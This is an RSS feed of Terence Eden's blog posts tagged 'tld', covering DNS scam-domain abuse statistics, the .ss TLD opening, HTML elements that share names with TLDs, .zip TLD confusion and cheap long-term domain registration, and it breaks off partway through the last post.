<?xml version="1.0" encoding="UTF-8"?>
<?xml-stylesheet href="https://shkspr.mobi/blog/wp-content/themes/edent-wordpress-theme/rss-style.xsl" type="text/xsl"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	    xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	     xmlns:dc="http://purl.org/dc/elements/1.1/"
	   xmlns:atom="http://www.w3.org/2005/Atom"
	     xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	  xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>
<channel>
	<title>tld &#8211; Terence Eden’s Blog</title>
	<atom:link href="https://shkspr.mobi/blog/tag/tld/feed/" rel="self" type="application/rss+xml" />
	<link>https://shkspr.mobi/blog</link>
	<description>Regular nonsense about tech and its effects 🙃</description>
	<lastBuildDate>Sat, 05 Sep 2026 17:12:13 +0000</lastBuildDate>
	<language>en-GB</language>
	<copyright>© Terence Eden. 🄯 CC BY-SA. See https://shkspr.mobi/blog/copyright-and-copyleft/</copyright>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>https://wordpress.org/?v=7.1.2</generator>

<image>
	<url>https://shkspr.mobi/blog/wp-content/uploads/2023/07/cropped-avatar-32x32.jpeg</url>
	<title>tld &#8211; Terence Eden’s Blog</title>
	<link>https://shkspr.mobi/blog</link>
	<width>32</width>
	<height>32</height>
</image> 
	<item>
		<title><![CDATA[The purpose of DNS is to spread scams]]></title>
		<link>https://shkspr.mobi/blog/2026/09/the-purpose-of-dns-is-to-spread-scams/</link>
					<comments>https://shkspr.mobi/blog/2026/09/the-purpose-of-dns-is-to-spread-scams/#comments</comments>
				<dc:creator><![CDATA[Terence Eden]]></dc:creator>
		<pubDate>Sun, 06 Sep 2026 11:34:20 +0000</pubDate>
		<category><![CDATA[ICANN]]></category><category><![CDATA[internet]]></category><category><![CDATA[scam]]></category><category><![CDATA[spam]]></category><category><![CDATA[tld]]></category><category><![CDATA[web]]></category>		<guid isPermaLink="false">https://shkspr.mobi/blog/?p=74588</guid>

					<description><![CDATA[I imagine everyone here has received an unsolicited message telling them that their tax is overdue and that they urgently need to visit Genuine-Tax-Payment-Website.fart or that a parcel is delayed at customs and you can pay a small sum for its release at Almost-The-Right-Acronym.ak  You know it is a scam. Most people just mark as spam and move on with their day. But a significant number of people …]]></description>
										<content:encoded><![CDATA[<p>I imagine everyone here has received an unsolicited message telling them that their tax is overdue and that they urgently need to visit Genuine-Tax-Payment-Website.fart or that a parcel is delayed at customs and you can pay a small sum for its release at Almost-The-Right-Acronym.ak</p>

<p>You know it is a scam. Most people just mark as spam and move on with their day. But a significant number of people don't. They hastily visit the site, tap in their credit card details, give it their mother's maiden name, confirm address, upload a nude selfie, and only then realise that they've been had.</p>

<p>The Internet works at pretty close to the speed of light. You can register a .uk domain and a minute later it's accessible from the other side of the planet. Brilliant for users who want to quickly launch a website. Also brilliant for abusers who want to launch a spam campaign.</p>

<p>By the time enough people have reported the scammers' domain as suspicious, it is too late. In the time it takes for a registrar to disable the domain, or for its name to make its way to the <a href="https://safebrowsing.google.com/">Safe Browsing List</a>, a million messages have already been sent and enough people have handed over their details.</p>

<p>We're told that "<a href="https://en.wikipedia.org/wiki/The_purpose_of_a_system_is_what_it_does">the purpose of a system is what it does</a>". At the moment, the Domain Name System's purpose seems to be a vector for criminals to run scams on people at a terrifyingly high rate.</p>

<h2 id="how-big-is-this-problem"><a href="https://shkspr.mobi/blog/2026/09/the-purpose-of-dns-is-to-spread-scams/#how-big-is-this-problem">How big is this problem?</a></h2>

<p>BIG!</p>

<p>There's a great blog post by Andrew Campling which reports on this startling claim:</p>

<blockquote><p>The study found that at least 10% of all new gTLD domain names registered during the year had subsequently appeared on security blocklists by the time of analysis. It estimated that, taking account of subsequent blocklisting and associated domains not themselves blocklisted, the share of names registered by malicious actors <strong>may be closer to 20%</strong>.</p>

<p><a href="https://labs.ripe.net/author/andrew_campling/dns-abuse-and-criminal-infrastructure-beyond-definitions-and-blocklists/">DNS Abuse and Criminal Infrastructure: Beyond Definitions and Blocklists</a> (emphasis added)</p></blockquote>

<p>That links to a presentation by Interisle which contains some rather shocking statistics (<a href="https://www.icann.org/en/blogs/details/looking-beyond-the-numbers-understanding-malicious-domain-registration-data-10-08-2026-en">albeit with disputed methodology</a>). It looks at <em>generic</em> Top Level Domains (gTLD) - those are things like .com and .fun rather than country code TLDs (ccTLD) like .uk and .de.</p>

<p>It says 85 million new registrations of gTLDs were made in 2025. Of those 8.5 million were added to blocklists by May 2025. It reckons that a 10% abuse rate is the likely floor for these numbers and it's probably closer to 20%. One in five newly registered domains with a gTLD are scams. That's a bloody crisis.</p>

<p>13 TLDs had more than 50% of their registrations blocklisted.</p>

<img src="https://shkspr.mobi/blog/wp-content/uploads/2026/08/gTLDs.webp" alt="Table listing the top 13 generic Top-Level Domains (gTLDs) with the highest percentage of blocklisted, malicious new domains created in 2025. Ranked from highest to lowest blocklist percentage, top entries include .LOCKER (72.9%), .LGBT (72.2%), and .TOWN (70.2%). The table detail includes TLD operators, registration totals, and specific malicious domain metrics." width="1162" height="954" class="aligncenter">

<p>I can understand why .bid and .loan are popular with scammers. But why .mobi?! What did I ever do to you, eh?</p>

<p>Who are the scammers registering these through?</p>

<img src="https://shkspr.mobi/blog/wp-content/uploads/2026/08/registrars.webp" alt="List of registrars. NameCheap, Gname, Dynadot, NameSilo, GoDaddy." width="910" height="390" class="aligncenter">

<p>Ah, our old friends at NameCheap. See <a href="https://shkspr.mobi/blog/2021/05/why-do-scammers-love-namecheap/">Why do scammers love NameCheap?</a></p>

<p>If those five registrars had more effective policies, it might significantly dent the scammers' ability to ply their devious wares. Or they might just move on to other registrars.</p>

<p>As the report points out:</p>

<blockquote><p>suspension rates for blocklisted domains were 7.4% to 16.3%.</p></blockquote>

<p><a href="https://interisle.net/s/FullReport_MaliciousRegistrationsintheDomainNameMarket_2026_rev.pdf">The full report is on the Interisle website</a>.</p>

<h2 id="what-can-be-done"><a href="https://shkspr.mobi/blog/2026/09/the-purpose-of-dns-is-to-spread-scams/#what-can-be-done">What can be done?</a></h2>

<p>I don't know.</p>

<p>In the first instance, it might make sense for registrars to do strong Know Your Customer (KYC) checks on anyone buying a domain. But that stops anyone who wants to anonymously register <code>I-Hate-Nintendo.whatever</code> without risking the wrath of Intellectual Property lawyers.</p>

<p>Also, criminals have access to stolen money and stolen cards. They can convince a hapless mule to register a domain on the criminals' behalf.</p>

<p>Registrars could ask for an escrow payment. Pay €9 for the domain name put €900 in escrow. If your domain appears on a blocklist within the year, you forfeit the money. Criminals with stolen funds are unlikely to care but it would probably put off lots of people from getting a new domain.</p>

<p>There are various banned words and phrases depending on the TLD. For example, <a href="https://shkspr.mobi/blog/2024/07/ss-tld-opening-for-direct-registrations/">South Sudan</a> has a list of political words which they don't want associated with their .ss ccTLD.</p>

<p>But if one gTLD bans a word, a different one might not. A scammer doesn't care if the gTLD is .arse or .elbow - they just want the start of the domain to look legitimate.</p>

<p>Some registrars have strings that they don't allow. In fairness to NameCheap, when I tried to register <code>dwp-payments-gov-uk.pizza</code> it told me that domain was banned. It wouldn't let me get any gTLD with that name.</p>

<p>But all it takes is one registrar to be slightly lax and the scammers get through. Increasing the complexity of the rules is also a hell of a burden on smaller registrars.</p>

<p>Besides, it's pretty easy to get a generic enough looking domain and stick the confusing bit on a subdomain. Here are a clutch mentioned in the report:</p>

<ul>
<li><code>https://gov.uk-dwpaph.bond/uk/</code></li>
<li><code>https://gov.uk-dwpcjh.bond/uk/</code></li>
<li><code>https://gov.uk-dwpclc.bond/uk</code></li>
<li><code>https://gov.uk-dwpclw.bond/uk</code></li>
<li><code>https://gov.uk-dwpclj.bond/uk/</code></li>
</ul>

<p>Perhaps there ought to be a delay before a new domain goes live to allow people to object to it? That would give governments, banks, delivery companies, and a dozen more "important" organisations a right to veto any "dodgy" looking domain.</p>

<p>But suppose someone wants to register <code>gov-uk-stole-my-horse.horse</code> to protest the government's cruel policy of stealing horses - is that a legitimate use of a domain? What if the Darwin Pensioner Divas - a group of elderly singers - want to take payments for their new album of goth/punk covers, can the DPD delivery company veto <code>dpd-payments.music</code>?</p>

<p>Do we want a domain name system where powerful companies control exactly which domains we can register? If I have an idea for a domain on a Friday night do I have to wait until Monday before it can be launched? Are those companies realistically able to parse millions of domains per year and have a low false-positive rate?</p>

<p>All of these things are possible - but all of them come with an impact on legitimate users. To be clear, I don't know what the right answer is.</p>

<h2 id="what-is-icann-doing-about-it"><a href="https://shkspr.mobi/blog/2026/09/the-purpose-of-dns-is-to-spread-scams/#what-is-icann-doing-about-it">What is ICANN doing about it?</a></h2>

<p>Lots! It has been a few years since I've been to an ICANN meeting, but even back then the topic of abuse was high on the agenda. They appear to be looking at ways to coordinate abuse reports between various entities, along with some other policies which should hopefully work.</p>

<p>There are two salient points from <a href="https://hosted-files.sched.co/icann86/b3/TRANSC_I86SQV_Mon08June2026__GNSO-DNS%20Abuse%20Mitigation%20PDP%201%20%281%20of%204%29-en.pdf">one of the discussions held at the recent meeting</a></p>

<blockquote><p>If anybody thinks that in our current age of AI and as we move into different kinds of computing, DNS abuse is going to numerically stay steady and we will have a downward effect on that baseline 2027 number. I'm not sure that that's an accurate assumption. I think it's going to be the other thing, which is […] it's going to be easier to abuse the DNS.</p></blockquote>

<p>And</p>

<blockquote><p>Abusers are going to abuse because it's just too lucrative, because no matter what we do, they will find the way to make profit off of that, and will try to circumvent everything that we do. That is not a reason not to do it, though.</p></blockquote>

<p>Quite!</p>

<p>As I said, I don't know the answer to this. What I do know is, much like <a href="https://shkspr.mobi/blog/2025/08/is-it-possible-to-allow-sideloading-and-keep-users-safe/">Android's app ecosystem being a haven for scammers</a>, DNS is facing a crisis. When trust in a system goes, only chaos follows.</p>

<p>I don't want to live in a world where I have to show my passport and pay thousands of pounds to register a domain which is only available after being vetted by private interests. But I also don't want to live in a world where scammers have effectively no deterrent from abusing millions of people.</p>

<p>The purpose of a system is what it does. I hope DNS's purpose can become less dangerous while still remaining open.</p>
<img src="https://shkspr.mobi/blog/wp-content/themes/edent-wordpress-theme/info/okgo.php?ID=74588&amp;HTTP_REFERER=RSS" alt="" width="1" height="1" loading="eager">]]></content:encoded>
					
					<wfw:commentRss>https://shkspr.mobi/blog/2026/09/the-purpose-of-dns-is-to-spread-scams/feed/</wfw:commentRss>
			<slash:comments>10</slash:comments>
		
		
			</item>
		<item>
		<title><![CDATA[.ss TLD opening for direct registrations]]></title>
		<link>https://shkspr.mobi/blog/2024/07/ss-tld-opening-for-direct-registrations/</link>
					<comments>https://shkspr.mobi/blog/2024/07/ss-tld-opening-for-direct-registrations/#respond</comments>
				<dc:creator><![CDATA[Terence Eden]]></dc:creator>
		<pubDate>Wed, 31 Jul 2024 11:34:05 +0000</pubDate>
		<category><![CDATA[africa]]></category><category><![CDATA[domains]]></category><category><![CDATA[ICANN]]></category><category><![CDATA[internet]]></category><category><![CDATA[tld]]></category>		<guid isPermaLink="false">https://shkspr.mobi/blog/?p=51212</guid>

					<description><![CDATA[It looks like South Sudan&#039;s Top Level Domain is going to start allowing direct registrations!  Long-time readers of this blog will know that it&#039;s possible to register  .me.ss domain names - there are various other 3rd level domains you can buy.  But, from the 1st of August 2024, you&#039;ll be able to apply for a 2nd level. So you&#039;ll be able to grab example.ss.  Here&#039;s the official announcement.    As …]]></description>
										<content:encoded><![CDATA[<p>It looks like South Sudan's Top Level Domain is going to start allowing direct registrations!</p>

<p>Long-time readers of this blog will know that <a href="https://shkspr.mobi/blog/2021/07/hot-mess-a-new-emoji-domain/">it's possible to register  <code>.me.ss</code> domain names</a> - there are various other <a href="https://nic.ss/faqs/">3rd level domains</a> you can buy.</p>

<p>But, from the 1st of August 2024, you'll be able to apply for a 2nd level. So you'll be able to grab <code>example.ss</code>.</p>

<p><a href="https://nic.ss/wp-content/uploads/2024/07/ssNIC-Registry-Sunrise-Registration-Policy-July-2024.pdf">Here's the official announcement</a>.</p>

<p><a href="https://nic.ss/wp-content/uploads/2024/07/ssNIC-Registry-Sunrise-Registration-Policy-July-2024.pdf"><img src="https://shkspr.mobi/blog/wp-content/uploads/2024/07/Sunrisess-fs8.png" alt="National Communication Authority (NCA) ssNIC Registry Sunrise Registration Policy July 2024. 1 Duration: The Registry will run the registration process according to the below timetable: Sunrise Period: 45 Days (1st August – 15th September 2024). Landrush Period: 30 Days (20th September – 10th October 2024). Early Access Period: 10 Days (15th October – 25th October 2024). General Availability: 1st November 2024" width="750" class="aligncenter size-full wp-image-51213"></a></p>

<p>As per normal for a new TLD, there will be a period where organisations with Trade Marks can register their domains. Then a period where anyone with sufficient cash can register their cool idea for a domain. Then it opens up to everyone.</p>

<p>So what will they cost? <a href="https://www.afriregister.com/">Afriregister</a> provided these prices:</p>

<table>
<thead>
<tr>
  <th>Period</th>
  <th align="right">Domain</th>
  <th align="right">Registration</th>
  <th align="right">Renewal</th>
</tr>
</thead>
<tbody>
<tr>
  <td>Sunrise (2 years)</td>
  <td align="right">.ss</td>
  <td align="right">€1020</td>
  <td align="right">€110</td>
</tr>
<tr>
  <td></td>
  <td align="right">.co.ss</td>
  <td align="right">€610</td>
  <td align="right">€60</td>
</tr>
<tr>
  <td>Landrush (1 year)</td>
  <td align="right">.ss</td>
  <td align="right">€300</td>
  <td align="right">€110</td>
</tr>
<tr>
  <td></td>
  <td align="right">.co.ss</td>
  <td align="right">€160</td>
  <td align="right">€60</td>
</tr>
<tr>
  <td>Early Access (1 year)</td>
  <td align="right">.ss</td>
  <td align="right">€220</td>
  <td align="right">€110</td>
</tr>
<tr>
  <td></td>
  <td align="right">.co.ss</td>
  <td align="right">€160</td>
  <td align="right">€60</td>
</tr>
<tr>
  <td>General (1 year)</td>
  <td align="right">.ss</td>
  <td align="right">€110</td>
  <td align="right">€110</td>
</tr>
<tr>
  <td></td>
  <td align="right">.co.ss</td>
  <td align="right">€60</td>
  <td align="right">€60</td>
</tr>
</tbody>
</table>

<p>For comparison, their .me.ss domains are only €25.</p>

<p>Registrations will only be allowed in ASCII - which means no IDNs.  The majority of the languages officially recognised in South Sudan appear to be written in the Latin script, so that shouldn't be a huge issue.</p>

<p>As is common with all other TLDs, there is a list of words which will not be allowed to be registered.</p>

<blockquote><p>Applications will not be accepted for domain names appearing on the Second Level Domain (SLD) block list.</p></blockquote>

<p>When I previously investigated this, there were lots of names which weren't available due to local politics. Although there is <a href="https://web.archive.org/web/20210813045419/https://nic.ss/download/reserved_restricted_premium_list/?wpdmdl=2330&amp;refresh=6115fae57ea441628830437">an archived version of the list of banned words (PDF)</a>, the modern SLD Block List appears to have vanished from the registry. I've asked them for an updated list which I'll link to once I get it.</p>

<p>I think it is fair to say that <a href="https://www.theregister.com/2019/01/24/south_sudan_nazi_domain/">the .ss TLD has had a tumultuous history</a>.  There hasn't been much discussion of this change in policy since <a href="https://x.com/NCA_SSD/status/1811778704059547783/quotes">the announcement a few weeks ago</a> - but I hope that this opening up will help South Sudanese people &amp; businesses to establish their own distinct presence on the Internet.</p>
<img src="https://shkspr.mobi/blog/wp-content/themes/edent-wordpress-theme/info/okgo.php?ID=51212&amp;HTTP_REFERER=RSS" alt="" width="1" height="1" loading="eager">]]></content:encoded>
					
					<wfw:commentRss>https://shkspr.mobi/blog/2024/07/ss-tld-opening-for-direct-registrations/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title><![CDATA[False Friends - HTML Elements which are also Top Level Domains]]></title>
		<link>https://shkspr.mobi/blog/2023/09/false-friends-html-elements-which-are-also-top-level-domains/</link>
					<comments>https://shkspr.mobi/blog/2023/09/false-friends-html-elements-which-are-also-top-level-domains/#comments</comments>
				<dc:creator><![CDATA[Terence Eden]]></dc:creator>
		<pubDate>Mon, 18 Sep 2023 11:34:25 +0000</pubDate>
		<category><![CDATA[HTML]]></category><category><![CDATA[internet]]></category><category><![CDATA[tld]]></category>		<guid isPermaLink="false">https://shkspr.mobi/blog/?p=46823</guid>

					<description><![CDATA[In linguistics, a &#34;False Friend&#34; is a word which looks similar in multiple languages, but means something different in each of them. For example the word &#34;gift&#34; in English means &#34;a present&#34;, in German means &#34;poison&#34;, and in Norwegian it means &#34;married&#34;.  The Internet uses Top Level Domains (TLD) to organise information into hierarchies. This website uses .mobi - you may also be familiar with .com …]]></description>
										<content:encoded><![CDATA[<p>In linguistics, a "<a href="https://en.wikipedia.org/wiki/False_friend">False Friend</a>" is a word which looks similar in multiple languages, but means something different in each of them. For example the word "gift" in English means "a present", in German means "poison", and in Norwegian it means "married".</p>

<p>The Internet uses Top Level Domains (TLD) to organise information into hierarchies. This website uses .mobi - you may also be familiar with .com for commercial entities, or .de for German pages.</p>

<p>The World Wide Web uses HyperText Markup Language (HTML) to structure web pages. For example <code>&lt;footer&gt;</code> to display a footer, or <code>&lt;ol&gt;</code> for an ordered list.</p>

<p>There is absolutely no relationship between the two sets of entities. But, just for fun, are there any HTML elements which happen to be false friends of the TLDs?</p>

<p>Before we go any further, have a quick think. How many do you reckon there are? Are there some which spring to mind immediately?</p>

<p>Obviously, the first port of call is AI. Its mastery of all things means that we can get an accurate answer in a nanosecond.</p>

<img src="https://shkspr.mobi/blog/wp-content/uploads/2023/09/chatgpt-fs8.png" alt="Me: Which TLDs have the same name as valid HTML5 elements? ChatGPT:  As of my last knowledge update in September 2021, there are two top-level domains (TLDs) that have the same name as valid HTML5 elements:  .dev: This TLD corresponds to the <dev> HTML5 element.  .app: This TLD corresponds to the <app> HTML5 element. Please note that this information is based on the state of TLDs as of September 2021. There might have been updates or changes after that date, so it's always a good idea to check official sources or domain registrars for the most current information." width="932" height="473" class="aligncenter size-full wp-image-46824">

<p>Oh.</p>

<p>Right, let's compare the <a href="https://developer.mozilla.org/en-US/docs/Web/HTML/Element">Element Reference</a> with the <a href="https://www.iana.org/domains/root/db">Root Zone Database</a>.</p>

<p>There are <em>fifteen</em> current HTML elements which have a match with a TLD. And a couple which are deprecated.  Here they are:</p>

<table>
<thead>
<tr>
  <th align="center"></th>
  <th align="right">HTML</th>
  <th>TLD</th>
</tr>
</thead>
<tbody>
<tr>
  <td align="center">🔊</td>
  <td align="right"><code>&lt;audio&gt;</code></td>
  <td><a href="https://nic.audio/">.audio</a></td>
</tr>
<tr>
  <td align="center">🇧🇷</td>
  <td align="right"><code>&lt;br&gt;</code></td>
  <td><a href="https://registro.br/">.br</a></td>
</tr>
<tr>
  <td align="center">🗂</td>
  <td align="right"><code>&lt;data&gt;</code></td>
  <td><a href="https://www.dishtlds.com/data/">.data</a></td>
</tr>
<tr>
  <td align="center">🇭🇷</td>
  <td align="right"><code>&lt;hr&gt;</code></td>
  <td><a href="https://www.domene.hr/portal/home">.hr</a></td>
</tr>
<tr>
  <td align="center">🇱🇮</td>
  <td align="right"><code>&lt;li&gt;</code></td>
  <td><a href="https://www.nic.li/">.li</a></td>
</tr>
<tr>
  <td align="center">🔗</td>
  <td align="right"><code>&lt;link&gt;</code></td>
  <td><a href="http://uniregistry.link/">.link</a></td>
</tr>
<tr>
  <td align="center">🗺</td>
  <td align="right"><code>&lt;map&gt;</code></td>
  <td><a href="https://nic.map/">.map</a></td>
</tr>
<tr>
  <td align="center">☰</td>
  <td align="right"><code>&lt;menu&gt;</code></td>
  <td><a href="http://nic.menu/">.menu</a></td>
</tr>
<tr>
  <td align="center">🔎</td>
  <td align="right"><code>&lt;search&gt;</code></td>
  <td><a href="https://nic.search/">.search</a></td>
</tr>
<tr>
  <td align="center">👉</td>
  <td align="right"><code>&lt;select&gt;</code></td>
  <td><a href="https://nic.select/">.select</a></td>
</tr>
<tr>
  <td align="center">🧥</td>
  <td align="right"><code>&lt;style&gt;</code></td>
  <td><a href="https://nic.style/">.style</a></td>
</tr>
<tr>
  <td align="center">🇹🇩</td>
  <td align="right"><code>&lt;td&gt;</code></td>
  <td><a href="https://nic.td/">.td</a></td>
</tr>
<tr>
  <td align="center">🇹🇭</td>
  <td align="right"><code>&lt;th&gt;</code></td>
  <td><a href="https://www.thnic.co.th/">.th</a></td>
</tr>
<tr>
  <td align="center">🇹🇷</td>
  <td align="right"><code>&lt;tr&gt;</code></td>
  <td><a href="https://nic.tr">.tr</a></td>
</tr>
<tr>
  <td align="center">📹</td>
  <td align="right"><code>&lt;video&gt;</code></td>
  <td><a href="https://nic.video">.video</a></td>
</tr>
</tbody>
</table>

<p>And the ones which are no longer valid HTML:</p>

<table>
<thead>
<tr>
  <th align="center"></th>
  <th align="right">HTML</th>
  <th>TLD</th>
</tr>
</thead>
<tbody>
<tr>
  <td align="center">🖕</td>
  <td align="right"><code>&lt;center&gt;</code></td>
  <td><a href="https://nic.center">.center</a></td>
</tr>
<tr>
  <td align="center">🇹🇹</td>
  <td align="right"><code>&lt;tt&gt;</code></td>
  <td><a href="https://www.nic.tt/">.tt</a></td>
</tr>
</tbody>
</table>

<p>Is that more than you expected? Less? Are there others which you think should be TLDs? Should HTML get a <code>&lt;uk&gt;</code> element post-Brexit? Have I missed any?</p>

<p>Comments in the usual box.</p>
<img src="https://shkspr.mobi/blog/wp-content/themes/edent-wordpress-theme/info/okgo.php?ID=46823&amp;HTTP_REFERER=RSS" alt="" width="1" height="1" loading="eager">]]></content:encoded>
					
					<wfw:commentRss>https://shkspr.mobi/blog/2023/09/false-friends-html-elements-which-are-also-top-level-domains/feed/</wfw:commentRss>
			<slash:comments>7</slash:comments>
		
		
			</item>
		<item>
		<title><![CDATA[The new .zip TLD is going to cause some problems]]></title>
		<link>https://shkspr.mobi/blog/2023/05/the-new-zip-tld-is-going-to-cause-some-problems/</link>
					<comments>https://shkspr.mobi/blog/2023/05/the-new-zip-tld-is-going-to-cause-some-problems/#comments</comments>
				<dc:creator><![CDATA[Terence Eden]]></dc:creator>
		<pubDate>Sat, 13 May 2023 11:34:42 +0000</pubDate>
		<category><![CDATA[google]]></category><category><![CDATA[internet]]></category><category><![CDATA[tld]]></category>		<guid isPermaLink="false">https://shkspr.mobi/blog/?p=45766</guid>

					<description><![CDATA[Many years ago, Google applied for the .zip Top Level Domain. ICANN, in its infinite wisdom, granted it. And now, I think, bad things are going to happen.  You see computers try to be helpful. They see you wrote &#34;visit example.com&#34; and autolink the thing which looks like a domain name. That&#039;s handy - especially as most people don&#039;t have the time or skill to write HTML.  So what happens when…]]></description>
										<content:encoded><![CDATA[<p>Many years ago, Google applied for the <code>.zip</code> Top Level Domain. ICANN, in its infinite wisdom, granted it. And now, I think, bad things are going to happen.</p>

<p>You see computers <em>try</em> to be helpful. They see you wrote "visit example.com" and autolink the thing which looks like a domain name. That's handy - especially as most people don't have the time or skill to write HTML.</p>

<p>So what happens when things which are <em>not</em> domain names look like they are domain names? I've been worrying about this for a few years:</p>

<blockquote class="social-embed" id="social-embed-567820810371735553" lang="en" itemscope="" itemtype="https://schema.org/SocialMediaPosting"><header class="social-embed-header" itemprop="author" itemscope="" itemtype="https://schema.org/Person"><a href="https://twitter.com/edent" class="social-embed-user" itemprop="url"><img class="social-embed-avatar social-embed-avatar-circle" src="data:image/webp;base64,UklGRkgBAABXRUJQVlA4IDwBAACQCACdASowADAAPrVQn0ynJCKiJyto4BaJaQAIIsx4Au9dhDqVA1i1RoRTO7nbdyy03nM5FhvV62goUj37tuxqpfpPeTBZvrJ78w0qAAD+/hVyFHvYXIrMCjny0z7wqsB9/QE08xls/AQdXJFX0adG9lISsm6kV96J5FINBFXzHwfzMCr4N6r3z5/Aa/wfEoVGX3H976she3jyS8RqJv7Jw7bOxoTSPlu4gNbfXYZ9TnbdQ0MNnMObyaRQLIu556jIj03zfJrVgqRM8GPwRoWb1M9AfzFe6Mtg13uEIqrTHmiuBpH+bTVB5EEQ3uby0C//XOAPJOFv4QV8RZDPQd517Khyba8Jlr97j2kIBJD9K3mbOHSHiQDasj6Y3forATbIg4QZHxWnCeqqMkVYfUAivuL0L/68mMnagAAA" alt="" itemprop="image"><div class="social-embed-user-names"><p class="social-embed-user-names-name" itemprop="name">Terence Eden is on Mastodon</p>@edent</div></a><img class="social-embed-logo" alt="Twitter" src="data:image/svg+xml,%3Csvg%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%0Aaria-label%3D%22Twitter%22%20role%3D%22img%22%0AviewBox%3D%220%200%20512%20512%22%3E%3Cpath%0Ad%3D%22m0%200H512V512H0%22%0Afill%3D%22%23fff%22%2F%3E%3Cpath%20fill%3D%22%231d9bf0%22%20d%3D%22m458%20140q-23%2010-45%2012%2025-15%2034-43-24%2014-50%2019a79%2079%200%2000-135%2072q-101-7-163-83a80%2080%200%200024%20106q-17%200-36-10s-3%2062%2064%2079q-19%205-36%201s15%2053%2074%2055q-50%2040-117%2033a224%20224%200%2000346-200q23-16%2040-41%22%2F%3E%3C%2Fsvg%3E"></header><section class="social-embed-text" itemprop="articleBody">Grrr... Because .zip is a valid TLD, it's impossible to know whether <a href="http://example.zip">example.zip</a> should be a URL or a filename.</section><hr class="social-embed-hr"><footer class="social-embed-footer"><a href="https://twitter.com/edent/status/567820810371735553"><span aria-label="9 likes" class="social-embed-meta">❤️ 9</span><span aria-label="5 replies" class="social-embed-meta">💬 5</span><span aria-label="0 reposts" class="social-embed-meta">🔁 0</span><time datetime="2015-02-17T23:00:05.000Z" itemprop="datePublished">23:00 - Tue 17 February 2015</time></a></footer></blockquote>

<p>Right now there is an old tweet, blog, email, or instant message from an authority figure which points to a non-existent .zip domain.</p>

<img src="https://shkspr.mobi/blog/wp-content/uploads/2023/05/people-of-Twitter-talking-about-photos.zip-there-are-lots-of-them.png" alt="people of Twitter talking about photos.zip there are lots of them." width="748" height="777" class="aligncenter size-full wp-image-45773">

<p>Is that domain available to buy? Well, <a href="https://www.registry.google/tlds/tech/">let's look at Google's Domain Availability site</a></p>

<img src="https://shkspr.mobi/blog/wp-content/uploads/2023/05/Screenshot-how-exciting-photos.zip-is-available.png" alt="Screenshot how exciting photos.zip is available." width="860" height="508" class="aligncenter size-full wp-image-45772">

<p><small>(No, I don't know where the missing "T" is either.)</small></p>

<p>Yup! OK, premium domains like <code>photos.zip</code> appear to be about £1,000 - which should put off some scammers. But the price for non-premium .zips is between £10-£30.</p>

<p>Look, I doubt a former president ever Tweeted "Hey, anyone know how I extract files from something called <a href="https://blah.zip">blah.zip</a> on a Mac?" but I'll bet you that something, somewhere, is going to be abused with this new TLD.</p>

<p>I feel like a curmudgeonly old fart. Don't we have <em>enough</em> TLDs? What's the limit?  There are very few meaningful controls on who can register all but the most retrictive TLDs (looking at you, <code>.int</code>!)  So at what point do we just give up and same everyone can have their own Top Level?</p>

<p>Anyway, have fun determining if the link you see was ever intended to link to a website!</p>
<img src="https://shkspr.mobi/blog/wp-content/themes/edent-wordpress-theme/info/okgo.php?ID=45766&amp;HTTP_REFERER=RSS" alt="" width="1" height="1" loading="eager">]]></content:encoded>
					
					<wfw:commentRss>https://shkspr.mobi/blog/2023/05/the-new-zip-tld-is-going-to-cause-some-problems/feed/</wfw:commentRss>
			<slash:comments>9</slash:comments>
		
		
			</item>
		<item>
		<title><![CDATA[What's the cheapest domain you can register for 10 years?]]></title>
		<link>https://shkspr.mobi/blog/2022/09/whats-the-cheapest-domain-you-can-register-for-10-years/</link>
					<comments>https://shkspr.mobi/blog/2022/09/whats-the-cheapest-domain-you-can-register-for-10-years/#comments</comments>
				<dc:creator><![CDATA[Terence Eden]]></dc:creator>
		<pubDate>Fri, 09 Sep 2022 11:34:22 +0000</pubDate>
		<category><![CDATA[dns]]></category><category><![CDATA[domains]]></category><category><![CDATA[tld]]></category>		<guid isPermaLink="false">https://shkspr.mobi/blog/?p=43463</guid>

					<description><![CDATA[I&#039;m concerned about the longevity of the domains I register. I want my domains to be available for as long as possible. But it seems that every year prices rise - and the discount often provided for a new domain rarely continues into subsequent years.  So I recently started renewing them for as long as possible. It turns out that most domains can be registered for a maximum of 10 years.  A…]]></description>
										<content:encoded><![CDATA[<p>I'm concerned about the longevity of the domains I register. I want my domains to be available for as long as possible. But it seems that every year prices rise - and the discount often provided for a new domain rarely continues into subsequent years.</p>

<p>So I recently started renewing them for as long as possible. It turns out that most domains can be registered for a maximum of 10 years<sup id="fnref:ten"><a href="https://shkspr.mobi/blog/2022/09/whats-the-cheapest-domain-you-can-register-for-10-years/#fn:ten" class="footnote-ref" title="Do let me know if there are exceptions to this rule which are available to the general public." role="doc-noteref">0</a></sup>.</p>

<p>A typical <code>.uk</code> domain will set you back the thick end of a hundred quid if you want it for a decade! Can I find something cheaper?</p>

<p>There are some free domain services like <a href="https://freenom.com/">freenom.com</a>. They'll give you a <code>.ml</code> domain for free. But you'll have to log in every year if you want to renew it. And, as I recently found out, they will sometimes just take away your free name and try to charge you for it.</p>

<p>Similarly, <a href="https://nic.ua/en/domains/.pp.ua"><code>.pp.ua</code> offers free domains to people in Ukraine</a>. They can only be registered for a single year at a time though.</p>

<p>If you want a Top Level Domain which you <em>can</em> renew for a decade, the cheapest appears to be <a href="http://www.nic.feedback/"><code>.feedback</code></a> which costs a smidge under £13 for 10 years.</p>

<img src="https://shkspr.mobi/blog/wp-content/uploads/2022/08/Screenshot-2022-08-25-at-18-13-44-My-Cart.png" alt="Screenshot showing £12.80 for 10 years." width="497" height="462" class="aligncenter size-full wp-image-43468">

<p>But, of course, there is a catch! You have to <a href="https://web.archive.org/web/20220913054217/http://www.eggsample.feedback/reviews">use the <code>.feedback</code> website hosting service</a> which, frankly, looks rubbish.
<a href="http://www.eggsample.feedback/reviews"><img src="https://shkspr.mobi/blog/wp-content/uploads/2022/08/eggsample.png" alt="Screenshot of a review website. It looks cheap and nasty." width="1023" height="731" class="aligncenter size-full wp-image-43465"></a></p>

